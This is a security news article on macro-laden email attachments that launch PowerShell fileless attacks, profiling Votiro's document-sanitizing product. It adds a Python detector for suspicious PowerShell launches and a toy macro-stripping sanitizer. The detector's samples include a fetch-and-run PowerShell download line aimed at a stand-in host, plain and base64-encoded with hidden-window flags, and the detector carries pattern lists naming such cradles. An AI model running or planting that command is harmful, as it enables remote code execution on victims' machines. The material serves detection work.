NEW TECH: Votiro detects and deters ‘weaponized email’ that exploits PowerShell tool for stealth

By Byron V. Acohido

It’s hard to believe this month marks the 20th anniversary of the release of the devastating Melissa email virus which spread around the globe in March 1999.

Related: The ‘Golden Age’ of cyber espionage is upon us

Melissa was hidden in a weaponized Word document that arrived as an email attachment. When the recipient clicked on the Word doc, a macro silently executed instructions to send a copy of the email, including the infected attachment, to the first 50 people listed as Outlook contacts.

Unfortunately, despite steady advances in malware detection and intrusion prevention systems, and much effort put into training employees to be wary of suspicious email, weaponized email and document-based malware remain as virulent and pervasive as they were two decades ago.

The Defense Department, for instance, detects 36 million malware-infested emails arriving from hackers, terrorists and foreign adversaries every 24 hours. That translates into some 13 billion weaponized emails raining down on the Pentagon annually. This gives you an idea of the steady flow of weaponized email attacks against companies of all sizes and in all sectors, with certain verticals, namely financial services, healthcare companies and tech firms, bearing the brunt.

I had a revelatory discussion about this with Aviv Grafi, CEO of Votiro, at RSA 2019 in San Francisco last week. Votiro is a Tel Aviv-based security startup that is pioneering a new white-listing approach to help companies mitigate their exposure to weaponized email and document-distributed malware. For a full drill down, please listen to the accompanying podcast. The key takeaways:

Productivity vs. security

Threat actors fully grasp that humans will forever remain the weak link in any business network, and they're accomplished at sidestepping the latest perimeter and near-perimeter defenses. Meanwhile, they've also become adept at abusing widely used, legitimate workplace features, for instance the macros and scripting capabilities built into Microsoft Word documents and Adobe PDF files.


“A lot of businesses today rely on using these basic tools on a daily basis, for HR to review resumes, to process insurance claims, to open up financial tables, all those kinds of things,” Grafi noted.

Employees today receive mixed messages. Their work duties call for them to open and deal with business documents, “and at the same time the CSO actually may be directing them to think twice before they open any document,” Grafi says. “So, the challenge becomes productivity versus security.”

Meanwhile, sophisticated threat actors continue to rely on weaponized email and document-distributed malware as favored delivery vehicles. Granted, a high percentage of the malicious software circulating in the wild is filtered by advanced antivirus suites or detonated in sandboxes before it can do harm.

Effective attacks

Yet a steady volume of malicious code continues to get through. A typical successful attack works like this: the targeted victim is sent a document carrying a malicious macro, or a tainted PDF, inside an expertly spoofed email message. The message entices the recipient to open the attachment, which may be wrapped in a zip file, and to enable the macro. The macro then launches PowerShell and hands it a script that lives only in the memory of the host computer.

PowerShell is a command-line shell and scripting language that Microsoft has shipped by default with every Windows release since Windows 7. It was designed to make it convenient for system administrators to automate tasks and manage configurations across all Windows endpoints and servers in a company network.

PowerShell itself is not inert malware; it is a trusted, signed Microsoft binary that is present on every Windows machine. What attackers exploit is that it will take a script from its own command line, or pull one down from the network, and run it straight from memory, so no new executable is ever written to disk for a file-scanning antivirus to inspect. Legacy security technologies that only look at files therefore see nothing, which is why PowerShell has become a favorite way for threat actors to stealthily download and execute snippets of malicious script. This is what is referred to as a fileless attack, or living off the land, and it is not going to go away anytime soon.
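The same chain that makes this attack stealthy on disk leaves a trail elsewhere: Windows records which process started powershell.exe, and with script block logging enabled it records the de-obfuscated script itself (Event ID 4104 in the Microsoft-Windows-PowerShell/Operational log). The following is an added example of the triage logic a detection engineer would run over process-creation records for the macro-to-PowerShell chain described in the two paragraphs above. It is illustrative code written for this page, not Votiro's product or anything from the original article; the process records, the example.invalid URL and the high/medium/low thresholds are constructed assumptions, while the -EncodedCommand prefixes it recognizes are the ones powershell.exe actually accepts.

```python
"""Triage of process-creation records for the macro-to-PowerShell chain described
above. Added illustrative code for this article, not Votiro's product; records
and URLs below are constructed."""
import base64
import re
from typing import Dict, List, Optional, Tuple

# Document viewers that should almost never spawn a shell or script host.
DOCUMENT_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe", "acrord32.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}

# Fragments that recur in download-and-execute one-liners ("download cradles").
INDICATORS = {
    "invoke-expression": re.compile(r"\biex\b|invoke-expression", re.I),
    "download-cradle": re.compile(r"downloadstring|downloadfile|net\.webclient|invoke-webrequest|\biwr\b", re.I),
    "hidden-window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "bypass-policy": re.compile(r"-e(?:xecutionpolicy|p)\s+bypass", re.I),
    "no-profile": re.compile(r"-nop(?:rofile)?\b", re.I),
    "base64-in-script": re.compile(r"frombase64string", re.I),
}
# powershell.exe accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...);
# the argument is base64 of the UTF-16LE script, which hides it from naive string matching.
ENCODED_ARG = re.compile(r"(?:^|\s)-e(?:c|n|nc|ncoded|ncodedc|ncodedcommand)?\s+([A-Za-z0-9+/]+=*)", re.I)

def decode_encoded_command(command_line: str) -> Optional[str]:
    """Return the plaintext of an -EncodedCommand argument, or None if there is none."""
    m = ENCODED_ARG.search(command_line)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None

def scan_script(text: str) -> List[str]:
    """Names of the indicator patterns present in a command line or script block."""
    return [name for name, rx in INDICATORS.items() if rx.search(text)]

def triage(record: Dict[str, str]) -> Tuple[str, List[str]]:
    """Classify one process-creation record (Sysmon Event ID 1 style fields).
    Returns (verdict, reasons) with verdict 'high', 'medium' or 'low' (thresholds assumed)."""
    parent = record.get("ParentImage", "").rsplit("\\", 1)[-1].lower()
    image = record.get("Image", "").rsplit("\\", 1)[-1].lower()
    cmdline = record.get("CommandLine", "")
    reasons: List[str] = []
    doc_parent = parent in DOCUMENT_PARENTS and image in SCRIPT_HOSTS
    if doc_parent:
        reasons.append(f"document-parent:{parent}->{image}")
    decoded = decode_encoded_command(cmdline)
    if decoded is not None:
        reasons.append("encoded-command")
    reasons += scan_script(cmdline)
    if decoded is not None:  # scan what the blob actually runs, not just the wrapper
        reasons += ["decoded:" + r for r in scan_script(decoded)]
    strong = decoded is not None or any(r.endswith(("invoke-expression", "download-cradle")) for r in reasons)
    if doc_parent and (strong or len(reasons) > 1):
        return "high", reasons
    if doc_parent or strong:
        return "medium", reasons
    return "low", reasons

# Constructed samples: a stage-2 cradle as a macro would launch it, plus a benign admin job.
SAMPLE_CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage2.ps1')"
SAMPLE_B64 = base64.b64encode(SAMPLE_CRADLE.encode("utf-16le")).decode("ascii")
SAMPLE_RECORDS = {
    "macro-spawned-encoded": {
        "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": "powershell.exe -nop -w hidden -enc " + SAMPLE_B64},
    "admin-scheduled-backup": {
        "ParentImage": r"C:\Windows\explorer.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": r"powershell.exe -NoProfile -ExecutionPolicy RemoteSigned -File C:\Scripts\nightly-backup.ps1"},
    "plain-cradle": {
        "ParentImage": r"C:\Windows\explorer.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": "powershell.exe -ep bypass " + SAMPLE_CRADLE},
}

def run_samples() -> Dict[str, str]:
    """Verdict per constructed sample."""
    return {name: triage(rec)[0] for name, rec in SAMPLE_RECORDS.items()}

if __name__ == "__main__":
    for name, rec in SAMPLE_RECORDS.items():
        verdict, why = triage(rec)
        print(f"{name}: {verdict} {why}")
```

Two design points matter here. The decoder is what makes the first sample visible at all: the download cradle lives inside the base64 blob, so a rule that only pattern-matches the raw command line would see nothing but `-nop -w hidden -enc`. And -NoProfile on its own is ordinary administrative hygiene, which is why the scheduled backup rates low; it is the combination of an Office parent process, a hidden window and an encoded payload that should page someone.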

“Macros have been here for 25 years now, and the challenge is that Microsoft will never get rid of macros because they’re so widely used for legitimate actions,” Grafi said. “Hackers are using these same capabilities to execute malicious code, with malicious intentions, and then, bam, you’re infected.”

White-listing approach

Prior to co-founding Votiro, Grafi traveled the globe as a penetration tester. His assignment often was to break into the client’s network in order to show them what needed to be shored up. One attack scenario never failed. Grafi told me he would check for job openings at the targeted company; do some research on LinkedIn to find the names of current employees; and then send the HR department an email with an infected resume attached, citing a reference from a current worker.

“I was successful 100 percent of the time, because the job of the HR department was to open the resume I sent them,” he said.

This led Grafi to co-found Votiro. The company delivers an innovative white-listing service, called CDR, that takes a prevention, rather than detection, approach to disarming weaponized email and deterring document-delivered malware. CDR stands for “content disarm and reconstruction.”

“Instead of looking for the bad stuff, we generate a safe version of every document,” he explained. “So, the HR department, which gets tons of resumes every day, can click on those documents and open them without needing to think twice.”

CDR is designed to give employees peace of mind. Grafi puts it this way: “It assures you’re getting a safe version of all documents. Everything that is relevant to the user’s experience has been vetted and verified as being valid, such as the text, the bookmarks and the images. And all of the unknown, nasty stuff will be kept outside. In less than one second, our technology provides a safe document across all channels.”
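To make the “generate a safe version” idea in the preceding paragraphs concrete, here is an added toy version of content disarm and reconstruction for a Word package, written for this page and not Votiro's code. An OOXML document is a zip of parts, so the sanitizer assembles a new .docx from an allowlist of part names (body text, styles, images), then rewrites the relationship and content-type manifests so nothing references a part it left out. The macro-enabled input package is constructed inside the block and is not a real Word file; the allowlist, the part names and the placeholder VBA bytes are assumptions chosen for the demonstration.

```python
"""Toy content disarm and reconstruction (CDR) for a Word OOXML package: a fresh
package is assembled from an allowlist of parts and the manifests are rewritten to
match. Added illustrative code for this article, not Votiro's product."""
import io
import posixpath
import re
import zipfile
import xml.etree.ElementTree as ET
from typing import Dict, List, Set, Tuple

CT_NS = "http://schemas.openxmlformats.org/package/2006/content-types"
REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OD_REL = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/"
MACRO_MAIN = "application/vnd.ms-word.document.macroEnabled.main+xml"
PLAIN_MAIN = "application/vnd.openxmlformats-officedocument.wordprocessingml.document.main+xml"

# Assumed allowlist: what a text-and-images document needs. Anything else, such as
# vbaProject.bin, vbaData.xml, embeddings/, activeX/ or customXml/, is never copied.
ALLOWED_PARTS = [re.compile(p) for p in (
    r"^\[Content_Types\]\.xml$", r"^_rels/\.rels$", r"^docProps/(core|app)\.xml$",
    r"^word/(document|styles|fontTable|numbering)\.xml$", r"^word/theme/theme\d+\.xml$",
    r"^word/media/[^/]+\.(png|jpe?g|gif)$", r"^word/_rels/document\.xml\.rels$")]

def is_allowed(name: str) -> bool:
    return any(rx.match(name) for rx in ALLOWED_PARTS)

def _resolve(rels_name: str, target: str) -> str:
    """Target -> zip entry name; word/_rels/document.xml.rels targets are relative to word/."""
    base = posixpath.dirname(posixpath.dirname(rels_name))
    return posixpath.normpath(posixpath.join(base, target)).lstrip("/")

def rewrite_rels(rels_name: str, data: bytes, kept: Set[str], report: List[str]) -> bytes:
    """Drop relationships that point at parts we did not copy; keep plain hyperlinks."""
    root = ET.fromstring(data)
    for rel in list(root):
        target, external = rel.get("Target", ""), rel.get("TargetMode") == "External"
        keep = (rel.get("Type", "").endswith("/hyperlink") if external
                else _resolve(rels_name, target) in kept)
        if not keep:
            root.remove(rel)
            report.append(f"{rels_name}: dropped {rel.get('Id')} -> {target}")
    ET.register_namespace("", REL_NS)
    return ET.tostring(root, encoding="utf-8", xml_declaration=True)

def rewrite_content_types(data: bytes, kept: Set[str], report: List[str]) -> bytes:
    """Drop manifest entries for removed parts and macro types; retype the body as .docx."""
    root = ET.fromstring(data)
    for el in list(root):
        tag, ctype = el.tag.split("}")[-1], el.get("ContentType", "")
        if tag == "Override" and el.get("PartName", "").lstrip("/") not in kept:
            root.remove(el)
            report.append(f"[Content_Types].xml: dropped Override {el.get('PartName')}")
        elif tag == "Default" and ("vba" in ctype.lower() or "macroenabled" in ctype.lower()):
            root.remove(el)
            report.append(f"[Content_Types].xml: dropped Default .{el.get('Extension')}")
        elif ctype == MACRO_MAIN:
            el.set("ContentType", PLAIN_MAIN)
            report.append("[Content_Types].xml: body retyped from macro-enabled to plain")
    ET.register_namespace("", CT_NS)
    return ET.tostring(root, encoding="utf-8", xml_declaration=True)

def disarm(package: bytes) -> Tuple[Dict[str, bytes], List[str]]:
    """Return only the allowlisted parts, manifests fixed, plus a report of what was dropped."""
    src = zipfile.ZipFile(io.BytesIO(package))
    kept = {n for n in src.namelist() if is_allowed(n)}
    report = [f"dropped part {n}" for n in src.namelist() if n not in kept]
    parts = {n: src.read(n) for n in src.namelist() if n in kept}  # images copied verbatim; real CDR re-encodes
    parts["[Content_Types].xml"] = rewrite_content_types(parts["[Content_Types].xml"], kept, report)
    for name in [n for n in parts if n.endswith(".rels")]:
        parts[name] = rewrite_rels(name, parts[name], kept, report)
    return parts, report

def pack(parts: Dict[str, bytes]) -> bytes:
    """Write parts back out as a .docx (a zip)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        for name, body in parts.items():
            z.writestr(name, body)
    return buf.getvalue()

def build_sample_docm() -> bytes:
    """A constructed, minimal macro-enabled package (not a real Word file) to feed disarm()."""
    w = "http://schemas.openxmlformats.org/wordprocessingml/2006/main"
    return pack({
        "[Content_Types].xml": (f'<Types xmlns="{CT_NS}">'
            '<Default Extension="rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>'
            '<Default Extension="bin" ContentType="application/vnd.ms-office.vbaProject"/>'
            f'<Override PartName="/word/document.xml" ContentType="{MACRO_MAIN}"/>'
            '<Override PartName="/word/vbaData.xml" ContentType="application/vnd.ms-word.vbaData+xml"/></Types>').encode(),
        "_rels/.rels": (f'<Relationships xmlns="{REL_NS}"><Relationship Id="rId1" '
            f'Type="{OD_REL}officeDocument" Target="word/document.xml"/></Relationships>').encode(),
        "word/_rels/document.xml.rels": (f'<Relationships xmlns="{REL_NS}">'
            '<Relationship Id="rId2" Type="http://schemas.microsoft.com/office/2006/relationships/vbaProject" Target="vbaProject.bin"/>'
            f'<Relationship Id="rId3" Type="{OD_REL}hyperlink" Target="https://example.invalid/" TargetMode="External"/></Relationships>').encode(),
        "word/document.xml": f'<w:document xmlns:w="{w}"><w:body><w:p><w:r><w:t>Resume: J. Doe</w:t></w:r></w:p></w:body></w:document>'.encode(),
        "word/vbaProject.bin": b"\xd0\xcf\x11\xe0CONSTRUCTED-VBA-PLACEHOLDER",  # placeholder, not real VBA
        "word/vbaData.xml": b'<wne:vbaSuppData xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml"/>',
    })
```

The point is the direction of the decision: a part is copied only because it is on the list, so a VBA project, an ActiveX control or an attachment type nobody has seen before is dropped without anyone having to recognize it as malicious. A production CDR goes well beyond this toy: it re-encodes images rather than copying them, regenerates the body XML instead of passing it through, and deals with DDE fields and OLE objects inside document.xml; here a body that referenced a dropped part would still carry a dangling r:id that Word has to repair on open.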

Given human nature, and the fact that the work tools we're familiar with aren't going to go away anytime soon, there's room for Votiro's white-listing approach. Hopefully, it will help slow the daily deluge of weaponized email and materially help derail document-distributed malware.

Talk more soon.


Pulitzer Prize-winning business journalist Byron V. Acohido is dedicated to fostering public awareness about how to make the Internet as private and secure as it ought to be.

(LW provides consulting services to the vendors we cover.)

